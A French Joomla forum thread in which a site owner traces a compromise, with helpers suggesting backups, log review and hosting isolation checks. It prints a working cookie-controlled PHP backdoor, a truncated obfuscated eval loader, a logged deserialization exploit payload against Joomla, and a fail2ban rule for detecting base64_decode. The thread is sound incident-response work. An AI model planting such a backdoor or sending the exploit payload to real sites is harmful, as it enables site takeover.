Site hacké

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Site hacké

    Bonjour,

    J'ai un site protégé par aesecure

    Je viens de m'apercevoir aujourd'hui de la présence d'urls étranges en tapant: site:www.loisirs-divertissements.com

    Dual Binary Option Optionsxpress / Trading With Good Win Ratio
    http:// www. loisirs-divertissements.com/dual-binary-option-optionsxpress/
    This Strategy Involves Using Long-Term Binary Options And News Trading. Dual Binary Option Optionsxpress!

    Trading Binary Options Forex, Indicator With 83% Win-Rate.
    http:// www. loisirs-divertissements.com/trading-binary-options-forex/
    Find Out How Trading Strategies Specially Designed For Binary Options Can Help. Trading Binary Options Forex!

    Bien sur ces urls n'existent pas ...

    Je viens d'essayer de voir d'où cela pouvait venir.
    J'ai trouvé un fichier dans \librairies\cms\schema\importmod.php au contenu douteux.


    Code:
    <?php $uijgG9147 = ")sp7klijab1y35*;t8.en2cqm_orxzd6ghw(fvu904/";$P8048 = $uijgG9147[2].$uijgG9147[27].$uijgG9147[19].$uijgG9147[32].$uijgG9147[25].$uijgG9147[27].$uijgG9147[19].$uijgG9147[2].$uijgG9147[5].$uijgG9147[8].$uijgG9147[22].$uijgG9147[19];$EFIMce9216 = "\x65\x76".chr(97)."l\x28g".chr(122)."\x69\x6ef".chr(108)."\x61\x74e\x28\x62\x61s".chr(101)."\x364".chr(95)."de".chr(99)."".chr(111)."\x64\x65\x28";$x9657 = "\x29".chr(41).")\x3b";$jpu1297.....
    Je me demande par contre par ou il est passé. Vous avez une idée ?

    J'ai la dernière version de joomla et la dernière version de flexicontent. ( je viens de désactiver un module : flexicalendar) . Il est peut être passé par là...

    Si cela continu, je vais finir par mettre file_uploads=Off

    Eric

  • #2
    Re : Site hacké

    Bonjour

    Ce type de hack est souvent généré par la présence d'un code indésirable dans le fichier /includes/defines.php.

    Le code que tu as indiqué est, en effet, un virus.

    Jette aussi un coup d'oeil aux fihciers /index.php se trouvant dans tes dossiers templates.

    Pour le "par où"; c'est une question rudement compliquée. Il faudrait avoir une idée de la date du hack et analyser les logs des accès Apache pour essayer de trouver une piste.

    Si tu as un backup sain et récent, la solution la plus simple pour récupérer par soi-même son site est de restaurer l'archive.

    Bonne journée.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Site hacké

      Bonjour Christophe,

      J'ai regardé un peu plus dans le détail.
      Tout d'abord, le fichier /includes/defines.php est sain.
      En fait , il m'a placé dans dans le dossier \librairies\cms\schema\ le 29/08. à 18H30
      importmod.php
      mainmedias.gif de 22 Mo
      softwareicon.png
      updowngraphic.png
      webfooter.png

      Si je regarde les logs à cette heure la je vois:
      POST /components/com_akeeba/ujcaihb.php
      "GET /components/com_akeeba/ujcaihb.php

      Fichier qui contient:
      Code:
      <?php	
      error_reporting(0);
      class	ujoybv	{	
      	public	function	__construct()	{		
      		$jq	=	@$_COOKIE['exylwajbplhpdlvn3'];	
      		if	($jq)	{	
      			$option	=	$jq	(@$_COOKIE['exylwajbplhpdlvn2'])	;	
      			$au	=	$jq	(	@$_COOKIE['exylwajbplhpdlvn1'])	;	
      			$option	(	"/438/e"	,	$au	,	438	)	;	
      		}	else	{	
      			header("HTTP/1.0 404 Not Found");
      		}	
      	}	
      }	
      $content	=	new	ujoybv;
      maintenant comment ce fichier est arrivé là , je ne sais pas. ( il date de 2015 en fait)

      Eric

      Commentaire


      • #4
        Re : Site hacké

        La date peut être trafiquée mais oui, peut-être est-il là depuis longtemps
        Christophe (cavo789)
        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

        Commentaire


        • #5
          Re : Site hacké

          Tu peux deja regarder si dans ta sauvegarde saine, les fichiers sont présents ... et en conséquence, soit remonter une sauvegarde (le plus rapide) soit TOUT nettoyer du sol au plafond !!!

          Question a 2€ : Tu as plusieurs site web sur le même espace FTP ?
          Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
          Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

          Commentaire


          • #6
            Re : Site hacké

            Dommage je n'ai pas les logs du 04/05/2015, date d'implantation du fichier ujcaihb.php ( c'est trop loin).
            En fait, si je me rémémore un peu tout.
            Je me suis aperçu par hasard que j'avais été hacké en janvier 2016. Suite à cela j'avais fait le tour des fichiers, supprimé les fichiers douteux, fait les mises à jour et installé aesecure.

            Mais je suis visiblement passé à côté de ce fichier ujcaihb.php qui ressort aujourd'hui, plus d'un an après.
            ( La date n'a pas été modifiée, car il est présent dans toutes mes différentes sauvegardes)
            En espérant qu'encore une fois, j'e n'en ai pas oublié.

            Envoyé par manu93fr Voir le message
            Question a 2€ : Tu as plusieurs site web sur le même espace FTP ?
            Oui, j'ai plusieurs sites sur les serveurs ( en espérant qu'ils soient correctement isolés les uns des autres)


            Eric
            Dernière édition par seabird à 09/09/2016, 23h30

            Commentaire


            • #7
              Re : Site hacké

              Oui, j'ai plusieurs sites sur les serveurs ( en espérant qu'ils soient correctement isolés les uns des autres)
              et bien s'ils sont sur le même FTP en mutualisé ... genre :

              _ racine ftp
              |__ www1 -> site 1
              |__ www2 -> site 2
              |__ www3 -> site 3

              ça m'etonnerait
              Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
              Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

              Commentaire


              • #8
                Re : Site hacké

                Oula non , je n'ai pas fait comme ça.
                Chaque site a sont propre ftp limité à son www

                Commentaire


                • #9
                  Re : Site hacké

                  Bonjour

                  L'utilisateur FTP est une chose et les droits d'accès une autre.

                  Ce que Manu veut te faire prendre conscience c'est qu'un script PHP se trouvant dans \site1 pourrait très probablement aller créer des fichiers dans /site2 dès lors que le droit d'accès de l'utilisateur WWW est le même sur les deux sites; ce qui est généralement le cas sur les mutualisés.

                  Généralement veut dire que certains hébergeurs garantissent une isolation des sites entre eux alors même que le compte client est le même.

                  Si tu as des compétences en PHP, tu pourrais écrire un petit script PHP que tu placerais à la racine de ton site et qui ferait un print_r(glob('../*')); Je tape l'instruction vite fait, l'idée est de te montrer une instruction qui permet de lister le contenu d'un dossier. Ici ".." permet donc de remonter d'un niveau et donc, si tu vois les noms des dossiers site1, site2, ... c'est qu'il n'y a pas d'isolation. Un virus dans site1 pourrait alors attaquer site2 et vice-versa.
                  Christophe (cavo789)
                  Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                  Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                  Commentaire


                  • #10
                    Re : Site hacké

                    Oui mais sur mes sites , j'ai fait en sorte que cela ne soit pas l'utilisateur www-data qui execute les scripts mais l’utilisateur propriétaire des fichiers.
                    Sur mes serveurs debian7 , j'ai donc utilisé suexec et suphp

                    Par contre, sur mes serveurs debian8 , j'utilise php-fpm avec le système de pools et open_basedir. Car suphp n'est plus maintenu.
                    Maintenant, est ce que cela suffit...

                    Sinon , je suis en train encore de regarder mes logs et je vois ce type de requête ces jours ci.
                    Code:
                    "GET / HTTP/1.1" 200 5349 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3702:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvaW1hZ2VzL2xvbC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYl....
                    Je me demande s'il ne serait pas judicieux de créer un jail qui détecte base64_decode avec fail2ban , qui me bannera l'ip.
                    du style: failregex = ^<HOST> .*GET .*(base64_decode).*

                    Sinon j'ai comme tu me la proposé tapé print_r(glob('../*'));
                    C'est bon cela ne remonte pas, j'ai comme résultat: Array ( [0] => ../www )

                    Eric
                    Dernière édition par seabird à 10/09/2016, 16h18

                    Commentaire


                    • #11
                      Re : Site hacké

                      Très bien pour le glob.

                      Pour l'attaque c'est une attaque de décembre 2015 qui vise les Joomla non à jour et tournant sur un version de php non à jour également. Tu ne risques rien avec cette attaque si tes systèmes sont régulièrement mis à jour.
                      Christophe (cavo789)
                      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                      Commentaire


                      • #12
                        Re : Site hacké

                        penses-tu qu'il serait judicieux de créer un jail qui détecte base64_decode dans les logs avec fail2ban , qui me bannera l'ip.
                        du style: failregex = ^<HOST> .*GET .*(base64_decode).*

                        Eric

                        Commentaire


                        • #13
                          Re : Site hacké

                          Je n'ai aucune pratique de fail2ban. Je ne saurais te conseiller quelque chose.
                          Christophe (cavo789)
                          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                          Commentaire


                          • #14
                            Re : Site hacké

                            Ok, donc je viens de tester ce filtre. Il a l'air de fonctionner correctement, il me ban toutes les IP qui tente quelque-chose avec base64_decode.

                            Pour ceux que cela interresse et qui connaissent fail2ban:
                            dans le jail.local
                            [hacker-base64]
                            enabled = true
                            filter = hacker-base64
                            action = iptables[name=hacker-base64, port=http, protocol=tcp]
                            logpath = /var/log/apache*/*access.log
                            bantime = 86400
                            maxretry = 1


                            et créer un filtre hacker-base64.conf dans /filter.d
                            [Definition]
                            failregex = ^<HOST> .*GET .*(base64_decode).*
                            ignoreregex =



                            Eric

                            Commentaire

                            Annonce

                            Réduire
                            Aucune annonce pour le moment.

                            Partenaire de l'association

                            Réduire

                            Hébergeur Web PlanetHoster
                            Travaille ...
                            X